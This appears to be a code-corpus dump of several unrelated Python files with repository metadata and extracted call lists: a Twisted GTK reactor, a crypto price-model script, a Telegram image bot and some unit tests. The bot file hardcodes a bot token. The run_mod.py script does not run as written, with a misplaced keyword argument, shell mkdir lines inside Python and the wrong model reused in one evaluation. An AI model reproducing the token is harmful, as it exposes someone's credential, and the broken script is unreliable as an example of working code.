except: why = sys.exc_info()[1] log.msg('Error In %s' % source) log.deferr() if why: self._disconnectSelectable(source, why, inRead) def callback(self, source, condition): log.callWithLogger(source, self._doReadOrWrite, source, condition) self.simulate() # fire Twisted timers return 1 # 1=don't auto-remove the source def simulate(self): """ Run simulation loops and reschedule callbacks. """ if self._simtag is not None: gobject.source_remove(self._simtag) self.runUntilCurrent() timeout = min(self.timeout(), 0.1) if timeout is None: timeout = 0.1 # grumble self._simtag = gobject.timeout_add(int(timeout * 1010), self.simulate) class PortableGtkReactor(selectreactor.SelectReactor): """ Reactor that works on Windows. Sockets aren't supported by GTK+'s input_add on Win32. """ _simtag = None def crash(self): selectreactor.SelectReactor.crash(self) import gtk # mainquit is deprecated in newer versions if gtk.main_level(): if hasattr(gtk, 'main_quit'): gtk.main_quit() else: gtk.mainquit() def run(self, installSignalHandlers=1): import gtk self.startRunning(installSignalHandlers=installSignalHandlers) gobject.timeout_add(0, self.simulate) # mainloop is deprecated in newer versions if hasattr(gtk, 'main'): gtk.main() else: gtk.mainloop() def simulate(self): """ Run simulation loops and reschedule callbacks. """ if self._simtag is not None: gobject.source_remove(self._simtag) self.iterate() timeout = min(self.timeout(), 0.1) if timeout is None: timeout = 0.1 # grumble self._simtag = gobject.timeout_add(int(timeout * 1010), self.simulate) def install(useGtk=True): """ Configure the twisted mainloop to be run inside the gtk mainloop. @param useGtk: should glib rather than GTK+ event loop be used (this will be slightly faster but does not support GUI). """ reactor = Gtk2Reactor(useGtk) from twisted.internet.main import installReactor installReactor(reactor) return reactor def portableInstall(useGtk=True): """ Configure the twisted mainloop to be run inside the gtk mainloop. """ reactor = PortableGtkReactor() from twisted.internet.main import installReactor installReactor(reactor) return reactor if runtime.platform.getType() != 'posix': install = portableInstall __all__ = ['install']
[((40, 4, 40, 26), 'gobject.threads_init', 'gobject.threads_init', ({}, {}), '()', False, 'import gobject\n'), ((65, 7, 65, 23), 'gtk.main_level', 'gtk.main_level', ({}, {}), '()', False, 'import gtk\n'), ((85, 4, 85, 29), 'zope.interface.implements', 'implements', ({(85, 15, 85, 28): 'IReactorFDSet'}, {}), '(IReactorFDSet)', False, 'from zope.interface import implements\n'), ((379, 4, 379, 27), 'twisted.internet.main.installReactor', 'installReactor', ({(379, 19, 379, 26): 'reactor'}, {}), '(reactor)', False, 'from twisted.internet.main import installReactor\n'), ((390, 4, 390, 27), 'twisted.internet.main.installReactor', 'installReactor', ({(390, 19, 390, 26): 'reactor'}, {}), '(reactor)', False, 'from twisted.internet.main import installReactor\n'), ((395, 3, 395, 29), 'twisted.python.runtime.platform.getType', 'runtime.platform.getType', ({}, {}), '()', False, 'from twisted.python import log, runtime, failure\n'), ((32, 8, 32, 28), 'pygtk.require', 'pygtk.require', ({(32, 22, 32, 27): '"""2.0"""'}, {}), "('2.0')", False, 'import pygtk\n'), ((66, 8, 66, 23), 'gtk.main_quit', 'gtk.main_quit', ({}, {}), '()', False, 'import gtk\n'), ((89, 22, 89, 27), 'twisted.python.compat.set', 'set', ({}, {}), '()', False, 'from twisted.python.compat import set\n'), ((90, 23, 90, 28), 'twisted.python.compat.set', 'set', ({}, {}), '()', False, 'from twisted.python.compat import set\n'), ((92, 8, 92, 49), 'twisted.internet.posixbase.PosixReactorBase.__init__', 'posixbase.PosixReactorBase.__init__', ({(92, 44, 92, 48): 'self'}, {}), '(self)', False, 'from twisted.internet import main, base, posixbase, error, selectreactor\n'), ((207, 8, 207, 52), 'gobject.source_remove', 'gobject.source_remove', ({(207, 30, 207, 51): 'self._sources[source]'}, {}), '(self._sources[source])', False, 'import gobject\n'), ((242, 8, 242, 66), 'twisted.python.log.msg', 'log.msg', (), '', False, 'from twisted.python import log, runtime, failure\n'), ((262, 8, 262, 46), 'twisted.internet.posixbase.PosixReactorBase.crash', 'posixbase.PosixReactorBase.crash', ({(262, 41, 262, 45): 'self'}, {}), '(self)', False, 'from twisted.internet import main, base, posixbase, error, selectreactor\n'), ((268, 8, 268, 45), 'gobject.timeout_add', 'gobject.timeout_add', ({(268, 28, 268, 29): '(0)', (268, 31, 268, 44): 'self.simulate'}, {}), '(0, self.simulate)', False, 'import gobject\n'), ((305, 8, 305, 74), 'twisted.python.log.callWithLogger', 'log.callWithLogger', ({(305, 27, 305, 33): 'source', (305, 35, 305, 54): 'self._doReadOrWrite', (305, 56, 305, 62): 'source', (305, 64, 305, 73): 'condition'}, {}), '(source, self._doReadOrWrite, source, condition)', False, 'from twisted.python import log, runtime, failure\n'), ((334, 8, 334, 47), 'twisted.internet.selectreactor.SelectReactor.crash', 'selectreactor.SelectReactor.crash', ({(334, 42, 334, 46): 'self'}, {}), '(self)', False, 'from twisted.internet import main, base, posixbase, error, selectreactor\n'), ((337, 11, 337, 27), 'gtk.main_level', 'gtk.main_level', ({}, {}), '()', False, 'import gtk\n'), ((347, 8, 347, 45), 'gobject.timeout_add', 'gobject.timeout_add', ({(347, 28, 347, 29): '(0)', (347, 31, 347, 44): 'self.simulate'}, {}), '(0, self.simulate)', False, 'import gobject\n'), ((96, 27, 96, 57), 'gobject.main_context_default', 'gobject.main_context_default', ({}, {}), '()', False, 'import gobject\n'), ((99, 24, 99, 42), 'gobject.MainLoop', 'gobject.MainLoop', ({}, {}), '()', False, 'import gobject\n'), ((120, 12, 120, 57), 'twisted.internet.base._SignalReactorMixin._handleSignals', 'base._SignalReactorMixin._handleSignals', ({(120, 52, 120, 56): 'self'}, {}), '(self)', False, 'from twisted.internet import main, base, posixbase, error, selectreactor\n'), ((126, 12, 126, 31), 'twisted.internet.process.reapAllProcesses', '_reapAllProcesses', ({}, {}), '()', True, 'from twisted.internet.process import reapAllProcesses as _reapAllProcesses\n'), ((144, 19, 144, 68), 'gobject.io_add_watch', 'gobject.io_add_watch', ({(144, 40, 144, 46): 'source', (144, 48, 144, 57): 'condition', (144, 59, 144, 67): 'callback'}, {}), '(source, condition, callback)', False, 'import gobject\n'), ((158, 12, 158, 56), 'gobject.source_remove', 'gobject.source_remove', ({(158, 34, 158, 55): 'self._sources[source]'}, {}), '(self._sources[source])', False, 'import gobject\n'), ((257, 12, 257, 56), 'gobject.source_remove', 'gobject.source_remove', ({(257, 34, 257, 55): 'self.doIterationTimer'}, {}), '(self.doIterationTimer)', False, 'import gobject\n'), ((315, 12, 315, 47), 'gobject.source_remove', 'gobject.source_remove', ({(315, 34, 315, 46): 'self._simtag'}, {}), '(self._simtag)', False, 'import gobject\n'), ((350, 12, 350, 22), 'gtk.main', 'gtk.main', ({}, {}), '()', False, 'import gtk\n'), ((352, 12, 352, 26), 'gtk.mainloop', 'gtk.mainloop', ({}, {}), '()', False, 'import gtk\n'), ((360, 12, 360, 47), 'gobject.source_remove', 'gobject.source_remove', ({(360, 34, 360, 46): 'self._simtag'}, {}), '(self._simtag)', False, 'import gobject\n'), ((123, 16, 123, 58), 'signal.siginterrupt', 'signal.siginterrupt', ({(123, 36, 123, 50): 'signal.SIGCHLD', (123, 52, 123, 57): '(False)'}, {}), '(signal.SIGCHLD, False)', False, 'import sys, signal\n'), ((274, 46, 274, 68), 'twisted.internet.error.ConnectionDone', 'error.ConnectionDone', ({}, {}), '()', False, 'from twisted.internet import main, base, posixbase, error, selectreactor\n'), ((275, 46, 275, 68), 'twisted.internet.error.ConnectionLost', 'error.ConnectionLost', ({}, {}), '()', False, 'from twisted.internet import main, base, posixbase, error, selectreactor\n'), ((339, 16, 339, 31), 'gtk.main_quit', 'gtk.main_quit', ({}, {}), '()', False, 'import gtk\n'), ((341, 16, 341, 30), 'gtk.mainquit', 'gtk.mainquit', ({}, {}), '()', False, 'import gtk\n'), ((297, 16, 297, 47), 'twisted.python.log.msg', 'log.msg', ({(297, 24, 297, 46): "('Error In %s' % source)"}, {}), "('Error In %s' % source)", False, 'from twisted.python import log, runtime, failure\n'), ((298, 16, 298, 28), 'twisted.python.log.deferr', 'log.deferr', ({}, {}), '()', False, 'from twisted.python import log, runtime, failure\n'), ((296, 22, 296, 36), 'sys.exc_info', 'sys.exc_info', ({}, {}), '()', False, 'import sys, signal\n')]
fpl-analytics/gr_crypto
run_mod.py
2b0ab451c9c205a9f572c4bca23fffbb68ca188f
""" Setup: - Import Libraries - Setup tf on multiple cores - Import Data """ import pandas as pd import numpy as np import tensorflow as tf import seaborn as sns from time import time import multiprocessing import random import os from tensorflow.keras.models import Sequential from tensorflow.keras.layers import Dense, LSTM, ConvLSTM2D, Flatten from sklearn.preprocessing import StandardScaler from sklearn.linear_model import LinearRegression from sklearn.ensemble import RandomForestRegressor from joblib import dump, load from mod.prep import log_return, log_return_np, preprocess from mod.model import return_pred from mod.eval import evaluate_regression, evaluate_up_down cores = multiprocessing.cpu_count() tf.config.threading.set_inter_op_parallelism_threads(cores-1) root_folder = "data" wide_close = pd.read_csv(root_folder + "/working/wide_close.csv") wide_target = pd.read_csv(root_folder + "/working/wide_target.csv") asset_details = pd.read_csv(root_folder + "/asset_details.csv") assets = [str(i) for i in asset_details["Asset_ID"]] """ Preprocess """ close_returns = wide_close[assets].apply(log_return) close_returns["time"] = wide_close["time"] close_returns[assets] = close_returns[assets].replace([np.inf,-np.inf],np.nan) """ Linear Regression """ x_steps, y_steps = 60, [1, 15] col_in, col_out = "1", "1" train_x, test_x, train_y, test_y, time_d = preprocess(data_in = wide_close, col_in, col_out, time_col="time", x_steps, y_steps) # 1 step lr_1 = LinearRegression() lr_1.fit(train_x.reshape(-1, x_steps), train_y[:,0,:].reshape(-1, 1)) true, pred = return_pred(test_x, test_y[:,0,:], lr_1) evaluate_regression(true, pred) evaluate_up_down(true, pred) # 15 step lr_15 = LinearRegression() lr_15.fit(train_x.reshape(-1, x_steps), train_y[:,1,:].reshape(-1, 1)) true, pred = return_pred(test_x, test_y[:,1,:], lr_1) evaluate_regression(true, pred) evaluate_up_down(true, pred) """ calculate and store components seperately process: - first, get rolling values for each timestamp - then, predict 1 and 15 gaps and store in array """ # Production """ Steps: - Get train, val test and test indices. Importantly, this needs to cover all assets (even though not all assets exist) for the whole time period. - Build models """ assets = list(asset_details["Asset_ID"].astype(str)) # Get indexes i = np.select( [ (wide_close.index >= 0) & (wide_close.index <= (len(wide_close)*0.7)), (wide_close.index > (len(wide_close)*0.7)) & (wide_close.index <= (len(wide_close)*0.8)) ], ["train", "val"], default = "test") indexes = pd.DataFrame({"time":wide_close["time"], "set":i}) for a in assets: print("asset", a) filt = indexes["set"][~pd.isna(wide_close[a])] counts = filt.value_counts() df = pd.DataFrame({"counts":counts, "pct":counts/np.sum(counts)}) print(df, "\n\n") indexes_d = {} for s in indexes["set"].unique(): indexes_d[s] = indexes["time"][indexes["set"] == s] mkdir "model_files" mkdir "model_files/linear_regression" for a in assets: print("Asset", a) x_steps, y_steps = 60, [1, 16] cols_in, cols_out = a, a train_x, test_x, train_y, test_y, time_d = preprocess(wide_close, cols_in, cols_out, "time", x_steps, y_steps) # 1 step lr_1 = LinearRegression() lr_1.fit(train_x.reshape(-1, x_steps), train_y[:,0,:].reshape(-1, 1)) true, pred = return_pred(test_x, test_y[:,0,:], lr_1) print("Model 1 Metrics") evaluate_regression(true, pred) evaluate_up_down(true, pred) # 16 step lr_16 = LinearRegression() lr_16.fit(train_x.reshape(-1, x_steps), train_y[:,1,:].reshape(-1, 1)) true, pred = return_pred(test_x, test_y[:,1,:], lr_16) print("Model 16 Metrics") evaluate_regression(true, pred) evaluate_up_down(true, pred) dump(lr_1, f"model_files/linear_regression/lr_{a}_1") dump(lr_16, f"model_files/linear_regression/lr_{a}_16") dump(time_d, "model_files/linear_regression/lr_times") """ Random Forest """ rf = RandomForestRegressor(n_jobs=-1) # start = time.time() rf.fit(train_x.reshape(-1, x_steps), train_y.reshape(-1)) # print("Took:", round(start-time.time()))
[]
menlen/one
bot.py
e24f1489d98faa9b548ebd668f2860c8d671b489
# This example show how to use inline keyboards and process button presses import telebot import time from telebot.types import InlineKeyboardMarkup, InlineKeyboardButton import os, sys from PIL import Image, ImageDraw, ImageFont import random TELEGRAM_TOKEN = '1425859530:AAF5MQE87Zg_bv3B2RLe3Vl2A5rMz6vYpsA' bot = telebot.TeleBot(TELEGRAM_TOKEN) channelId = -1001390673326 user_dict = {} def TextToImg(ext): IMAGES = [ 'AROQ.jpg', 'AK47.jpg', 'BAXT.jpg', 'BASKETBOL.jpg', 'BAXTLI.jpg', 'DOST.jpg', 'ER.jpg', 'ETIK.jpg', 'FUTBOL.jpg', 'GAZ.jpg', 'HOTIN.jpg', 'BAXT.jpg', 'IPHONE.jpg', 'KOLBASA.jpg', 'KONFET.jpg', 'KOZGU.jpg', 'KUCHUK.jpg', 'MOSHINA.jpg', 'NEWISHTON.jpg', 'NOTEBOOK.jpg', 'OMAD.jpg', 'OYINCHOQ.jpg', 'PAYPQO.jpg', 'BAXT.jpg', 'PUL.jpg', 'PULTUG.jpg', 'QORQIZ.jpg', 'SOSISKA.jpg', 'TELEFON.jpg', 'TELEFONZ.jpg', 'TOK.jpg', 'TORSHIM.jpg', 'TUYA.jpg', 'UY.jpg', 'ZAMBARAK.jpg' ] try: img = random.choice(IMAGES) except: time.sleep(2) img = random.choice(IMAGES) # get an image base = Image.open(img).convert("RGBA") ext = ext.upper() text = ext # make a blank image for the text, initialized to transparent text color txt = Image.new("RGBA", base.size, (255,255,255,0)) # get a font fnt = ImageFont.truetype("OpenSans-Italic.ttf", 40) # get a drawing context d = ImageDraw.Draw(txt) # draw text, half opacity d.text(((800)/2,(1136)/2), text, font=fnt, fill=(255,0,0,255), anchor='mb') out = Image.alpha_composite(base, txt) filename = random.randint(1,35) g = out.save(f'{filename}.png') return filename def gen_markup(): markup = InlineKeyboardMarkup() markup.row_width = 1 markup.add(InlineKeyboardButton("Azo bo'ling", callback_data="cb_yes", url='t.me/onideal'), InlineKeyboardButton("Tasdiqlash", callback_data="cb_no")) return markup def getUserFromChannel(userId): u = bot.get_chat_member(channelId, userId) return u.status @bot.callback_query_handler(func=lambda call: True) def callback_query(call): if call.data == "cb_yes": bot.answer_callback_query(call.id, "Answer is Yes") elif call.data == "cb_no": u = getUserFromChannel(call.from_user.id) if u == 'member': msg = bot.send_message(call.from_user.id, """\ Juda soz!!!, Ismingizni yozing """) bot.register_next_step_handler(msg, process_name_step) else: bot.send_message(call.from_user.id, f"Salom {call.from_user.first_name}, kanallarga a'zo bo'ling va A'zolikni tekshirish buyrug'ini tanlang", reply_markup=gen_markup()) def process_name_step(message): try: name = message.text myfile = TextToImg(name) photoSend = open(f'{myfile}.png', 'rb') caption = f'{name} : ismiga sovga @onideal \n@giftmerobot \n@mygiftrobot' bot.send_photo(message.chat.id, photoSend, caption=caption) except Exception as e: bot.reply_to(message, 'oooops') @bot.message_handler(func=lambda message: True) def message_handler(message): us = getUserFromChannel(message.chat.id) if us == 'member': msg = bot.send_message(message.chat.id, """\ Juda soz!!!, Ismingizni yozing """) bot.register_next_step_handler(msg, process_name_step) else: bot.send_message(message.chat.id, f"Salom {message.from_user.first_name}, kanallarga a'zo bo'ling va A'zolikni tekshirish buyrug'ini tanlang", reply_markup=gen_markup()) bot.polling(none_stop=True)
[((11, 6, 11, 37), 'telebot.TeleBot', 'telebot.TeleBot', ({(11, 22, 11, 36): 'TELEGRAM_TOKEN'}, {}), '(TELEGRAM_TOKEN)', False, 'import telebot\n'), ((66, 10, 66, 55), 'PIL.Image.new', 'Image.new', ({(66, 20, 66, 26): '"""RGBA"""', (66, 28, 66, 37): 'base.size', (66, 39, 66, 54): '(255, 255, 255, 0)'}, {}), "('RGBA', base.size, (255, 255, 255, 0))", False, 'from PIL import Image, ImageDraw, ImageFont\n'), ((68, 10, 68, 55), 'PIL.ImageFont.truetype', 'ImageFont.truetype', ({(68, 29, 68, 50): '"""OpenSans-Italic.ttf"""', (68, 52, 68, 54): '40'}, {}), "('OpenSans-Italic.ttf', 40)", False, 'from PIL import Image, ImageDraw, ImageFont\n'), ((70, 8, 70, 27), 'PIL.ImageDraw.Draw', 'ImageDraw.Draw', ({(70, 23, 70, 26): 'txt'}, {}), '(txt)', False, 'from PIL import Image, ImageDraw, ImageFont\n'), ((75, 10, 75, 42), 'PIL.Image.alpha_composite', 'Image.alpha_composite', ({(75, 32, 75, 36): 'base', (75, 38, 75, 41): 'txt'}, {}), '(base, txt)', False, 'from PIL import Image, ImageDraw, ImageFont\n'), ((77, 15, 77, 35), 'random.randint', 'random.randint', ({(77, 30, 77, 31): '1', (77, 32, 77, 34): '35'}, {}), '(1, 35)', False, 'import random\n'), ((82, 13, 82, 35), 'telebot.types.InlineKeyboardMarkup', 'InlineKeyboardMarkup', ({}, {}), '()', False, 'from telebot.types import InlineKeyboardMarkup, InlineKeyboardButton\n'), ((57, 14, 57, 35), 'random.choice', 'random.choice', ({(57, 28, 57, 34): 'IMAGES'}, {}), '(IMAGES)', False, 'import random\n'), ((84, 15, 84, 94), 'telebot.types.InlineKeyboardButton', 'InlineKeyboardButton', (), '', False, 'from telebot.types import InlineKeyboardMarkup, InlineKeyboardButton\n'), ((85, 31, 85, 88), 'telebot.types.InlineKeyboardButton', 'InlineKeyboardButton', (), '', False, 'from telebot.types import InlineKeyboardMarkup, InlineKeyboardButton\n'), ((59, 8, 59, 21), 'time.sleep', 'time.sleep', ({(59, 19, 59, 20): '(2)'}, {}), '(2)', False, 'import time\n'), ((60, 14, 60, 35), 'random.choice', 'random.choice', ({(60, 28, 60, 34): 'IMAGES'}, {}), '(IMAGES)', False, 'import random\n'), ((62, 11, 62, 26), 'PIL.Image.open', 'Image.open', ({(62, 22, 62, 25): 'img'}, {}), '(img)', False, 'from PIL import Image, ImageDraw, ImageFont\n')]
Southampton-RSG/2019-03-13-southampton-swc
novice/python-unit-testing/answers/test_rectangle2.py
1f07d82c1bd1f237a19fa7a17bb4765e0364dc88
from rectangle2 import rectangle_area def test_unit_square(): assert rectangle_area([0, 0, 1, 1]) == 1.0 def test_large_square(): assert rectangle_area([1, 1, 4, 4]) == 9.0 def test_actual_rectangle(): assert rectangle_area([0, 1, 4, 7]) == 24.0
[((4, 11, 4, 39), 'rectangle2.rectangle_area', 'rectangle_area', ({(4, 26, 4, 38): '[0, 0, 1, 1]'}, {}), '([0, 0, 1, 1])', False, 'from rectangle2 import rectangle_area\n'), ((7, 11, 7, 39), 'rectangle2.rectangle_area', 'rectangle_area', ({(7, 26, 7, 38): '[1, 1, 4, 4]'}, {}), '([1, 1, 4, 4])', False, 'from rectangle2 import rectangle_area\n'), ((10, 11, 10, 39), 'rectangle2.rectangle_area', 'rectangle_area', ({(10, 26, 10, 38): '[0, 1, 4, 7]'}, {}), '([0, 1, 4, 7])', False, 'from rectangle2 import rectangle_area\n')]
unclechu/py-radio-class
tests/requestreply.py
8f96d8bcb398693d18a4ebd732415a879047edee
# -*- coding: utf-8 -*- from unittest import TestCase, TestLoader from radio import (Radio, ListenerNotFound, ReplyHandlerAlreadyBound, HandlerAlreadyBound) def init_radio(f): def wrap(self, *args): self.radio = Radio() return f(self, *args) return wrap class TestRadioRequestReplyMethods(TestCase): @init_radio def test_request_reply_stop_replying(self): ''' "request", "reply" and "stopReplying" methods work correctly. ''' def foo_handler(): return 'foo' def bar_handler(my_arg=222): return my_arg self.radio.reply('foo', foo_handler) self.radio.reply('bar', bar_handler) self.assertEqual(self.radio.request('foo'), 'foo') self.assertEqual(self.radio.request('bar'), 222) self.assertEqual(self.radio.request('bar', 333), 333) self.assertEqual(self.radio.request('bar', my_arg=444), 444) self.radio.stopReplying('foo') self.radio.stopReplying('bar') with self.assertRaises(ListenerNotFound): self.radio.request('foo') with self.assertRaises(ListenerNotFound): self.radio.request('bar') @init_radio def test_kwargs(self): ''' Keyword arguments works correctly. ''' foo_list = [] def foo_handler(foo, bar): return (foo, bar) self.radio.reply('foo', foo_handler) self.assertEqual(self.radio.request('foo', bar=5, foo=10), (10, 5)) @init_radio def test_on_already_bound(self): ''' "reply" fails when trying to bound handler that is already bounded. ''' def foo_handler(): pass self.radio.reply('foo', foo_handler) self.radio.reply('bar', foo_handler) # General exception with self.assertRaises(HandlerAlreadyBound): self.radio.reply('foo', foo_handler) # Child exception with self.assertRaises(ReplyHandlerAlreadyBound): self.radio.reply('foo', foo_handler) @init_radio def test_off_handler_that_was_not_bounded(self): ''' "stopReplying" fails when trying to unbound handler that was not bounded. ''' def foo_handler(): pass with self.assertRaises(ListenerNotFound): self.radio.stopReplying('foo', foo_handler) @init_radio def test_off_soft_mode(self): ''' "stopReplying" will not fail if safe-argument is set to True. ''' def foo_handler(): pass self.radio.stopReplying('foo', foo_handler, soft=True) self.radio.stopReplying('foo', foo_handler, soft=True) @init_radio def test_trigger_fail_on_incorrect_arguments(self): ''' "request" fails when arguments for handler is incorrect. ''' def foo_handler(required_arg): pass self.radio.reply('foo', foo_handler) with self.assertRaises(TypeError): self.radio.request('foo') suite = TestLoader().loadTestsFromTestCase(TestRadioRequestReplyMethods)
[((12, 21, 12, 28), 'radio.Radio', 'Radio', ({}, {}), '()', False, 'from radio import Radio, ListenerNotFound, ReplyHandlerAlreadyBound, HandlerAlreadyBound\n'), ((106, 8, 106, 20), 'unittest.TestLoader', 'TestLoader', ({}, {}), '()', False, 'from unittest import TestCase, TestLoader\n')]
sophiawa/Mayan-EDMS
mayan/apps/rest_api/exceptions.py
42f20576d0c690b645a60bf53c5169cda4264231
class APIError(Exception): """ Base exception for the API app """ pass class APIResourcePatternError(APIError): """ Raised when an app tries to override an existing URL regular expression pattern """ pass
[]
Immich/jina
tests/unit/types/message/test_message.py
1f5f7cf4d82029d76ab41df157526fe6f6e0da50
import sys from typing import Sequence import pytest from jina import Request, QueryLang, Document from jina.clients.request import request_generator from jina.proto import jina_pb2 from jina.proto.jina_pb2 import EnvelopeProto from jina.types.message import Message from jina.types.request import _trigger_fields from tests import random_docs @pytest.mark.parametrize('field', _trigger_fields.difference({'command', 'args', 'flush'})) def test_lazy_access(field): reqs = (Request(r.SerializeToString(), EnvelopeProto()) for r in request_generator(random_docs(10))) for r in reqs: assert not r.is_used # access r.train print(getattr(r, field)) # now it is read assert r.is_used def test_multiple_access(): reqs = [Request(r.SerializeToString(), EnvelopeProto()) for r in request_generator(random_docs(10))] for r in reqs: assert not r.is_used assert r assert not r.is_used for r in reqs: assert not r.is_used assert r.index assert r.is_used def test_lazy_nest_access(): reqs = (Request(r.SerializeToString(), EnvelopeProto()) for r in request_generator(random_docs(10))) for r in reqs: assert not r.is_used # write access r.train r.docs[0].id = '1' * 16 # now it is read assert r.is_used assert r.index.docs[0].id == '1' * 16 def test_lazy_change_message_type(): reqs = (Request(r.SerializeToString(), EnvelopeProto()) for r in request_generator(random_docs(10))) for r in reqs: assert not r.is_used # write access r.train r.control.command = jina_pb2.RequestProto.ControlRequestProto.IDLE # now it is read assert r.is_used assert len(r.index.docs) == 0 def test_lazy_append_access(): reqs = (Request(r.SerializeToString(), EnvelopeProto()) for r in request_generator(random_docs(10))) for r in reqs: assert not r.is_used r.request_type = 'index' # write access r.train r.docs.append(Document()) # now it is read assert r.is_used def test_lazy_clear_access(): reqs = (Request(r.SerializeToString(), EnvelopeProto()) for r in request_generator(random_docs(10))) for r in reqs: assert not r.is_used # write access r.train r.ClearField('index') # now it is read assert r.is_used def test_lazy_nested_clear_access(): reqs = (Request(r.SerializeToString(), EnvelopeProto()) for r in request_generator(random_docs(10))) for r in reqs: assert not r.is_used # write access r.train r.index.ClearField('docs') # now it is read assert r.is_used def test_lazy_msg_access(): reqs = [Message(None, r.SerializeToString(), 'test', '123', request_id='123', request_type='IndexRequest') for r in request_generator(random_docs(10))] for r in reqs: assert not r.request.is_used assert r.envelope assert len(r.dump()) == 3 assert not r.request.is_used for r in reqs: assert not r.request.is_used assert r.request assert len(r.dump()) == 3 assert not r.request.is_used for r in reqs: assert not r.request.is_used assert r.request.index.docs assert len(r.dump()) == 3 assert r.request.is_used def test_message_size(): reqs = [Message(None, r, 'test', '123') for r in request_generator(random_docs(10))] for r in reqs: assert r.size == 0 assert sys.getsizeof(r.envelope.SerializeToString()) assert sys.getsizeof(r.request.SerializeToString()) assert len(r.dump()) == 3 assert r.size > sys.getsizeof(r.envelope.SerializeToString()) \ + sys.getsizeof(r.request.SerializeToString()) def test_lazy_request_fields(): reqs = (Request(r.SerializeToString(), EnvelopeProto()) for r in request_generator(random_docs(10))) for r in reqs: assert list(r.DESCRIPTOR.fields_by_name.keys()) def test_request_extend_queryset(): q1 = {'name': 'SliceQL', 'parameters': {'start': 3, 'end': 4}} q2 = QueryLang({'name': 'SliceQL', 'parameters': {'start': 3, 'end': 4}, 'priority': 1}) q3 = jina_pb2.QueryLangProto() q3.name = 'SliceQL' q3.parameters['start'] = 3 q3.parameters['end'] = 4 q3.priority = 2 r = Request() r.queryset.extend([q1, q2, q3]) assert isinstance(r.queryset, Sequence) assert len(r.queryset) == 3 for idx, q in enumerate(r.queryset): assert q.priority == idx assert q.parameters['start'] == 3 assert q.parameters['end'] == 4 # q1 and q2 refer to the same assert len({id(q) for q in r.queryset}) == 2 r2 = Request() r2.queryset.extend(r.queryset) assert len({id(q) for q in r2.queryset}) == 2 r = Request() r.queryset.append(q1) r.queryset.append(q2) r.queryset.append(q3) for idx, q in enumerate(r.queryset): assert q.priority == idx assert q.parameters['start'] == 3 assert q.parameters['end'] == 4 with pytest.raises(TypeError): r.queryset.extend(1) @pytest.mark.parametrize('typ,pb_typ', [('train', jina_pb2.RequestProto.TrainRequestProto), ('index', jina_pb2.RequestProto.IndexRequestProto), ('search', jina_pb2.RequestProto.SearchRequestProto), ('control', jina_pb2.RequestProto.ControlRequestProto)]) def test_empty_request_type(typ, pb_typ): r = Request() assert r.request_type is None with pytest.raises(ValueError): print(r.body) r.request_type = typ assert r._request_type == typ assert isinstance(r.body, pb_typ) @pytest.mark.parametrize('typ,pb_typ', [('index', jina_pb2.RequestProto.IndexRequestProto), ('search', jina_pb2.RequestProto.SearchRequestProto)]) def test_add_doc_to_type(typ, pb_typ): r = Request() r.request_type = typ for _ in range(10): r.docs.append(Document()) r.groundtruths.append(Document()) assert len(r.docs) == 10 assert len(r.groundtruths) == 10
[((170, 1, 173, 96), 'pytest.mark.parametrize', 'pytest.mark.parametrize', ({(170, 25, 170, 37): '"""typ,pb_typ"""', (170, 39, 173, 95): "[('train', jina_pb2.RequestProto.TrainRequestProto), ('index', jina_pb2.\n RequestProto.IndexRequestProto), ('search', jina_pb2.RequestProto.\n SearchRequestProto), ('control', jina_pb2.RequestProto.ControlRequestProto)\n ]"}, {}), "('typ,pb_typ', [('train', jina_pb2.RequestProto.\n TrainRequestProto), ('index', jina_pb2.RequestProto.IndexRequestProto),\n ('search', jina_pb2.RequestProto.SearchRequestProto), ('control',\n jina_pb2.RequestProto.ControlRequestProto)])", False, 'import pytest\n'), ((185, 1, 186, 94), 'pytest.mark.parametrize', 'pytest.mark.parametrize', ({(185, 25, 185, 37): '"""typ,pb_typ"""', (185, 39, 186, 93): "[('index', jina_pb2.RequestProto.IndexRequestProto), ('search', jina_pb2.\n RequestProto.SearchRequestProto)]"}, {}), "('typ,pb_typ', [('index', jina_pb2.RequestProto.\n IndexRequestProto), ('search', jina_pb2.RequestProto.SearchRequestProto)])", False, 'import pytest\n'), ((15, 34, 15, 90), 'jina.types.request._trigger_fields.difference', '_trigger_fields.difference', ({(15, 61, 15, 89): "{'command', 'args', 'flush'}"}, {}), "({'command', 'args', 'flush'})", False, 'from jina.types.request import _trigger_fields\n'), ((135, 9, 135, 92), 'jina.QueryLang', 'QueryLang', ({(135, 19, 135, 91): "{'name': 'SliceQL', 'parameters': {'start': 3, 'end': 4}, 'priority': 1}"}, {}), "({'name': 'SliceQL', 'parameters': {'start': 3, 'end': 4},\n 'priority': 1})", False, 'from jina import Request, QueryLang, Document\n'), ((136, 9, 136, 34), 'jina.proto.jina_pb2.QueryLangProto', 'jina_pb2.QueryLangProto', ({}, {}), '()', False, 'from jina.proto import jina_pb2\n'), ((141, 8, 141, 17), 'jina.Request', 'Request', ({}, {}), '()', False, 'from jina import Request, QueryLang, Document\n'), ((153, 9, 153, 18), 'jina.Request', 'Request', ({}, {}), '()', False, 'from jina import Request, QueryLang, Document\n'), ((157, 8, 157, 17), 'jina.Request', 'Request', ({}, {}), '()', False, 'from jina import Request, QueryLang, Document\n'), ((175, 8, 175, 17), 'jina.Request', 'Request', ({}, {}), '()', False, 'from jina import Request, QueryLang, Document\n'), ((188, 8, 188, 17), 'jina.Request', 'Request', ({}, {}), '()', False, 'from jina import Request, QueryLang, Document\n'), ((117, 12, 117, 43), 'jina.types.message.Message', 'Message', ({(117, 20, 117, 24): 'None', (117, 26, 117, 27): 'r', (117, 29, 117, 35): '"""test"""', (117, 37, 117, 42): '"""123"""'}, {}), "(None, r, 'test', '123')", False, 'from jina.types.message import Message\n'), ((166, 9, 166, 33), 'pytest.raises', 'pytest.raises', ({(166, 23, 166, 32): 'TypeError'}, {}), '(TypeError)', False, 'import pytest\n'), ((177, 9, 177, 34), 'pytest.raises', 'pytest.raises', ({(177, 23, 177, 33): 'ValueError'}, {}), '(ValueError)', False, 'import pytest\n'), ((17, 43, 17, 58), 'jina.proto.jina_pb2.EnvelopeProto', 'EnvelopeProto', ({}, {}), '()', False, 'from jina.proto.jina_pb2 import EnvelopeProto\n'), ((29, 43, 29, 58), 'jina.proto.jina_pb2.EnvelopeProto', 'EnvelopeProto', ({}, {}), '()', False, 'from jina.proto.jina_pb2 import EnvelopeProto\n'), ((42, 43, 42, 58), 'jina.proto.jina_pb2.EnvelopeProto', 'EnvelopeProto', ({}, {}), '()', False, 'from jina.proto.jina_pb2 import EnvelopeProto\n'), ((53, 43, 53, 58), 'jina.proto.jina_pb2.EnvelopeProto', 'EnvelopeProto', ({}, {}), '()', False, 'from 